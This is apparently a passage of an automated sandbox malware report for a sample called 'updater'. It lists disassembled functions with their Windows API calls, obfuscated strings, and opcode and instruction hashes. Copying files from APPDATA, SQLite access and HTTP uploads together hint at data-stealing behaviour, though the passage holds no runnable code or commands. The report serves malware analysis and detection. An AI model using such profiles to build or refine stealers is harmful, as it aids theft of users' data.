                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CriticalSection$CloseHandle$EnterLeaveOpen$ConditionConnectHttpRequestVariableWake
                                    • String ID: [^BAOJK\.$~a}z
                                    • API String ID: 3302835935-3567702361
                                    • Opcode ID: b845f930feb8237ad7e002d7827c6065a050e3e33785bb648000369a585614fe
                                    • Instruction ID: 6a856c9d70f0f9fc280b05b2e31724d468838c63f1c5c8c8bb7ea22e1fe11557
                                    • Opcode Fuzzy Hash: b845f930feb8237ad7e002d7827c6065a050e3e33785bb648000369a585614fe
                                    • Instruction Fuzzy Hash: B2B16571D04349AEDB16DFB9D8489ADFBB0FF25618F28512EE4046B1A2DB705C86CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$InformationTimeZone
                                    • String ID: Pacific Daylight Time$Pacific Standard Time
                                    • API String ID: 597776487-1154798116
                                    • Opcode ID: ae64f72eb244fe26b43e9eeaba83e24aedc28ed164552dc2367ca45d68236eb3
                                    • Instruction ID: 8b75c7eb214fecc5f21d9dbf95e212ce62871dfd79f3f74342904ca7882838ea
                                    • Opcode Fuzzy Hash: ae64f72eb244fe26b43e9eeaba83e24aedc28ed164552dc2367ca45d68236eb3
                                    • Instruction Fuzzy Hash: D7C11931900225AFDB259F6DD840BAA7FF9FF69210F94406FE5859B362E73889C1CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50
                                      • Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
                                      • Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9
                                    • CopyFileA.KERNEL32 ref: 013BDB97
                                      • Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
                                      • Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
                                      • Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                    • String ID: .$APPDATA$A\OI$KrBK$Lr$XKBJ
                                    • API String ID: 265086031-2824349140
                                    • Opcode ID: b11d72745dbd576f803c7161077f40e80a326bf64ebd6ea2e34172699c384726
                                    • Instruction ID: 90d8fde6a0b57aa30bf0976cd4c2f7482ea4f4c545b05de7d097684355a8f152
                                    • Opcode Fuzzy Hash: b11d72745dbd576f803c7161077f40e80a326bf64ebd6ea2e34172699c384726
                                    • Instruction Fuzzy Hash: 6BE17C31C0528ADEDF15DBE8C990AEDBBB4AF24308F2441AED50567291EB706F49CF61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50
                                      • Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
                                      • Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9
                                    • CopyFileA.KERNEL32 ref: 013BEB81
                                      • Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
                                      • Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
                                      • Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                    • String ID: BKZ$JOZ.$JOZ.$rYOB$rYOBBKZJOZ.
                                    • API String ID: 265086031-1704678390
                                    • Opcode ID: 6c909a507827916d7498afddf3a290d20dae687199df9c9ff5219fa664aaf161
                                    • Instruction ID: 253188e0d3301e13fa8925df80cf744ce2371b0171098d0c31beed7169222b75
                                    • Opcode Fuzzy Hash: 6c909a507827916d7498afddf3a290d20dae687199df9c9ff5219fa664aaf161
                                    • Instruction Fuzzy Hash: 29C11630D0428ADEDB15EBE8C484BEDFBB0BF25304F2440AED5557B1A2EB706A49CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • HttpSendRequestExA.WININET(?,?,00000000,00000000,00000000), ref: 013CC368
                                    • InternetWriteFile.WININET(?,?,?,?), ref: 013CC37D
                                    • InternetWriteFile.WININET(?,?,?,?), ref: 013CC388
                                    • InternetWriteFile.WININET(?,?,00000010,?), ref: 013CC395
                                    • HttpEndRequestA.WININET(?,00000000,00000000,00000000), ref: 013CC39E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileInternetWrite$HttpRequest$Send
                                    • String ID: (
                                    • API String ID: 2326806561-3887548279
                                    • Opcode ID: 9394345eae8669c147780b9adb5eee9bace685b87b21f75c68c124adaae17a74
                                    • Instruction ID: bd4d2aceb548809800ab86997ed2e8f40f493ddc792285d1ab10e0e251c66f03
                                    • Opcode Fuzzy Hash: 9394345eae8669c147780b9adb5eee9bace685b87b21f75c68c124adaae17a74
                                    • Instruction Fuzzy Hash: B2311EB2D04219AFDB14DFA8DC44AEEBFB8FF48704F10842EE516A7251D6359A05CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: api-ms-$ext-ms-
                                    • API String ID: 0-537541572
                                    • Opcode ID: f57af94f7f0fb8d86781349066d50c68d7f88cdee96f8a91bab99c581106b504
                                    • Instruction ID: a79efd71c3fe202ef71987f393e4476245b9efab0868a9052b24ac5e06f27003
                                    • Opcode Fuzzy Hash: f57af94f7f0fb8d86781349066d50c68d7f88cdee96f8a91bab99c581106b504
                                    • Instruction Fuzzy Hash: 5821EB73A01315A7DB318A289C40B1B3BA8AF057F0F150116ED15A73B9E634DD0EC6D0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: -journal$-stmtjrnl$:memory:
                                    • API String ID: 4218353326-2512898500
                                    • Opcode ID: 5cd4912d045003de6f29d1d99112b5b78a27df13d247e2008e7bde373740b034
                                    • Instruction ID: 57693a18c204ee8fc12efd7c2d00e91f4bbf32f322e017c7e0d3da10b73f960c
                                    • Opcode Fuzzy Hash: 5cd4912d045003de6f29d1d99112b5b78a27df13d247e2008e7bde373740b034
                                    • Instruction Fuzzy Hash: 92B1CC72900746AFDB25CFADD840AAABBF0FF54308F14882EE586E7B51D631E901CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0141221F,?,?,01454064,00000000,?,0141234A,00000004,InitializeCriticalSectionEx,0143BC58,0143BC60,00000000), ref: 014121EE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID: api-ms-
                                    • API String ID: 3664257935-2084034818
                                    • Opcode ID: bbfb60c4294806c23fdc0d2ba2aaea7a672bc9e50f28da479d9c111b472840f3
                                    • Instruction ID: 878a375c12b0405fe68a255b8746498e3b44f27955c63db7bb07f41840d00102
                                    • Opcode Fuzzy Hash: bbfb60c4294806c23fdc0d2ba2aaea7a672bc9e50f28da479d9c111b472840f3
                                    • Instruction Fuzzy Hash: B511A779A40229ABDF33C66DAC44F5E77A4AF05770F350112EF10E73A8D6B0E90086D1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __alloca_probe_16.LIBCMT ref: 01421537
                                    • __alloca_probe_16.LIBCMT ref: 014215FD
                                    • __freea.LIBCMT ref: 01421669
                                      • Part of subcall function 0142255C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0142838D,00000220,?,?,?,?,?,?,01413E8D,?), ref: 0142258E
                                    • __freea.LIBCMT ref: 01421672
                                    • __freea.LIBCMT ref: 01421695
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                    • String ID:
                                    • API String ID: 1423051803-0
                                    • Opcode ID: 9a67ec56d03151ea301803f9b574d1a94da270945f5c4a295fc0149b5e4251b3
                                    • Instruction ID: 7f686d60ab6bc57b9952443840ebce1e31ff745ec0fa0698313afa89a629d5ba
                                    • Opcode Fuzzy Hash: 9a67ec56d03151ea301803f9b574d1a94da270945f5c4a295fc0149b5e4251b3
                                    • Instruction Fuzzy Hash: A651D872500227AFEB319E69CC40EBF3BA9EF54A50F99016BFD09A7260D774DC91C690
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 013ECC8A: _strlen.LIBCMT ref: 013ECCB1
                                    • _strlen.LIBCMT ref: 013EE07E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: $%s.%s$sqlite_subquery_%p_
                                    • API String ID: 4218353326-1950918665
                                    • Opcode ID: a61e5d02286324232713c2aaffde12143fa0e53f632b644e2c878307d661ce72
                                    • Instruction ID: d6999f82e6f75d729a39cf8b5d82ae09c59a56244512e4e4e678746910902742
                                    • Opcode Fuzzy Hash: a61e5d02286324232713c2aaffde12143fa0e53f632b644e2c878307d661ce72
                                    • Instruction Fuzzy Hash: 1E022E71E0032A9FDB15CFA8D4487AEBBF1FF88318F148569D405AB291D775E842CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50
                                      • Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
                                      • Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9
                                      • Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
                                      • Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
                                      • Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB
                                    • CopyFileA.KERNEL32 ref: 013BE687
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                    • String ID: APPDATA$BKZ.$rLWZKMAG@.
                                    • API String ID: 265086031-1647078963
                                    • Opcode ID: e0630eebdc2e4268f9b596f9dcc3b373437f572679b1a2efa737608c204897d0
                                    • Instruction ID: 66a18acb95aa1bdd56dc3550d4fe5ccebb45737ad9703147404c19cdca2932ad
                                    • Opcode Fuzzy Hash: e0630eebdc2e4268f9b596f9dcc3b373437f572679b1a2efa737608c204897d0
                                    • Instruction Fuzzy Hash: 0C029E31D0025ADEDB25EBA8C990BEDBBB0AF25304F2041AED5457B291EB745F48CF61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50
                                      • Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
                                      • Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9
                                    • CopyFileA.KERNEL32 ref: 013BF4EB
                                      • Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
                                      • Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
                                      • Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                    • String ID: .$APPDATA$r.
                                    • API String ID: 265086031-2390542981
                                    • Opcode ID: 028e4346bac1de0d00ec10fcf42e82333795215de75e3b20abc4c48172d28874
                                    • Instruction ID: f0f45f6fb90f6c73ebff929f01706484bb5427b094f257ea7221434eadea535b
                                    • Opcode Fuzzy Hash: 028e4346bac1de0d00ec10fcf42e82333795215de75e3b20abc4c48172d28874
                                    • Instruction Fuzzy Hash: 4FE1AF31C0024ADEDF15EBA8C990BEDBBB4AF24304F2441AED51577291EB706F89CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 013CA518: LoadLibraryA.KERNEL32(01455C78), ref: 013CA5B7
                                      • Part of subcall function 013CA518: GetProcAddress.KERNEL32(00000000,0145606C), ref: 013CA645
                                    • FreeLibrary.KERNEL32 ref: 013CAECC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Library$AddressFreeLoadProc
                                    • String ID: .$.$]]YA
                                    • API String ID: 145871493-2355798663
                                    • Opcode ID: e1955a41f863cd69477bbb0d68d6b4e44a6e692b660e219e5ea409e6cea09755
                                    • Instruction ID: db02a581d45269c2d40a762753032f09caf32f2537e56b871e25cef2a50722d0
                                    • Opcode Fuzzy Hash: e1955a41f863cd69477bbb0d68d6b4e44a6e692b660e219e5ea409e6cea09755
                                    • Instruction Fuzzy Hash: CCD1AB3090024A9FDB15EFE8C844BEDBBB1BF14718F1541ADE055AB2A2EB705E85CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50
                                      • Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
                                      • Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9
                                    • CopyFileA.KERNEL32 ref: 013BEFFE
                                      • Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
                                      • Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
                                      • Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                    • String ID: APPDATA$r.
                                    • API String ID: 265086031-3513159727
                                    • Opcode ID: 240dfc01b0769de2d001eecd1ebcc37d136ac0851368eefacd4335b0e36f843e
                                    • Instruction ID: 32a29ad405ea19f6221acd1c05f7f71f31cf5b232bc264b43e0b2b2f7db78085
                                    • Opcode Fuzzy Hash: 240dfc01b0769de2d001eecd1ebcc37d136ac0851368eefacd4335b0e36f843e
                                    • Instruction Fuzzy Hash: 3DE19F31C0424ADEDB15EBA8C990BEDBBB4AF24308F2441AED50577291EB706F89CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50
                                      • Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
                                      • Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9
                                    • CopyFileA.KERNEL32 ref: 013BD6D8
                                      • Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
                                      • Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
                                      • Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                    • String ID: APPDATA$ro\CA\Wr.
                                    • API String ID: 265086031-4119792198
                                    • Opcode ID: fd406042e4469f35762a63e383eb75ae66e7c8d0b325a499e76373d540270f4d
                                    • Instruction ID: 894da560ac51e60c1ae416fa83a113bda71c94de560da11abff3f53d6ee8260e
                                    • Opcode Fuzzy Hash: fd406042e4469f35762a63e383eb75ae66e7c8d0b325a499e76373d540270f4d
                                    • Instruction Fuzzy Hash: 76E18D31D0129ADEDB15EBE8C990BEDBBB4AF24308F1040AED5457B251EB705F48CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50
                                      • Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
                                      • Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9
                                    • CopyFileA.KERNEL32 ref: 013BFDDF
                                      • Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
                                      • Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
                                      • Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                    • String ID: APPDATA$rtMO]Fr.
                                    • API String ID: 265086031-1717016301
                                    • Opcode ID: 03a52d976a5f2ab3a4b3f4e50f8eb0f4a0c8a523b22118d2979b44b865743a42
                                    • Instruction ID: 8ff3b5281617ef0300b115d4d6f8f03f91f903298fa1fa0adef419a7095b1854
                                    • Opcode Fuzzy Hash: 03a52d976a5f2ab3a4b3f4e50f8eb0f4a0c8a523b22118d2979b44b865743a42
                                    • Instruction Fuzzy Hash: ECD17B31C0425ADEDF15EBA8C890AEDBBB4BF24304F1440AED5097B291EB705E89CF61
                                    Uniqueness

